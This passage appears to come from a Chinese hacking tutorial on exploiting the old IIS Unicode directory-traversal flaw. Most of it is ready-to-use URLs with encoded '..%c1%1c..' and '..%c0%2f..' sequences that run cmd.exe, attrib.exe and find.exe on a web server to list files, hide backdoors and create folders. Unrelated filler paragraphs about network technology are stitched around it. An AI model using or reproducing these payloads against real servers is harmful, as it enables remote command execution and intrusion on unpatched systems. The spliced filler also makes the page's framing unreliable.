網絡技術是從1990年代中期發展起來的新技術，它把互聯網上分散的資源融為有機整體，實現資源的全面共享和有機協作，使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享，網絡則被認為是互聯網發展的第三階段。

6.9 UNICODE漏洞入侵(2)

    

6. 顯示某一路徑下相同文件類型的文件

如果要顯示d盤Inetpub\scripts\wwwroot下的相同文件類型，可在瀏覽器的地址欄中輸入如下內容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/find.exe?/n+/v+""+d:\inetpub\wwwroot\*.ht*

如圖6-71所示。

圖6-71  顯示d盤Inetpub\scripts\wwwroot下的相同文件類型

7. attrib命令

顯示或更改文件屬性的命令。該命令顯示、設置或刪除指派給文件或目錄的只讀、存檔、系統以及隱藏屬性。入侵者有時會上傳一些后門程序，并用該命令將其隱藏起來。具體參數如表6-1所示。

   表6-1  attrib參數

 

這里的%2b相當于DOS下的+b，例如要查看d盤Inetpub\scripts\wwwroot下的index.htm的屬性，可在瀏覽器的地址欄中輸入如下內容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/attrib.exe?d:\inetpub\wwwroot\index.htm

或者：

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/attrib.exe?d:\inetpub\wwwroot\index.htm

如圖6-72所示。

圖6-72  查看index.htm的屬性

可以從圖6-72看出index.htm文件屬于只讀、隱藏、存檔。

8. md命令

創建目錄或子目錄。如果要向d盤下建立一個名為file的文件夾，可在瀏覽器的地址欄中輸入如下內容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+md d:\file

或者：

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+md d:\file

如圖6-73和6-74所示。

圖6-73  使用md命令建立文件夾

圖6-74  利用UNICODE漏洞建立文件夾file

遇到空格用%20代替，遇到長度超過8個字母的文件或是Program Files這一類文件時，將使用以下格式：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\progra~1 

或者：

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\progra~1 

如圖6-75所示。

圖6-75  查看Program Files文件夾

9. echo命令

回顯命令。在DOS模式下輸入echo/?，如圖6-76所示。

圖6-76  echo命令

echo回顯命令在系統默認下是打開的，如果輸入參數off則關閉回顯命令。在echo命令后面跟上一個字符，則該字符被回顯，如圖6-77所示。

圖6-77  echo命令的使用

10. 管道工具的使用

管道工具>、>>的功能是將命令產生的輸出重新定向，例如，寫到某個文件或輸出到打印機中。>>產生的內容將追加進文件中，>則將原文件內容覆蓋。在D盤下將dir命令列出的目錄，輸出到D盤文件ffhh.txt中，如圖6-78和圖6-79所示。

這時系統的D盤下會有個名為ffhh.txt的文件，打開后顯示著D盤下用dir列出的目錄，如圖6-81所示。

    

圖6-78  將D盤目錄輸出到ffhh.txt中       圖6-79  通過管道命令將D盤目錄寫入記事本

還有很多命令可以使用，如刪除目錄的rd命令、復制文件和目錄的xcopy命令、文件夾剪貼命令move等。

6.9.2小節介紹一個入侵者是如果利用UNICODE漏洞對網站進行攻擊的。

網絡的神奇作用吸引著越來越多的用戶加入其中，正因如此，網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......，各項技術都需要適時應勢，對應發展，這正是網絡迅速走向進步的催化劑。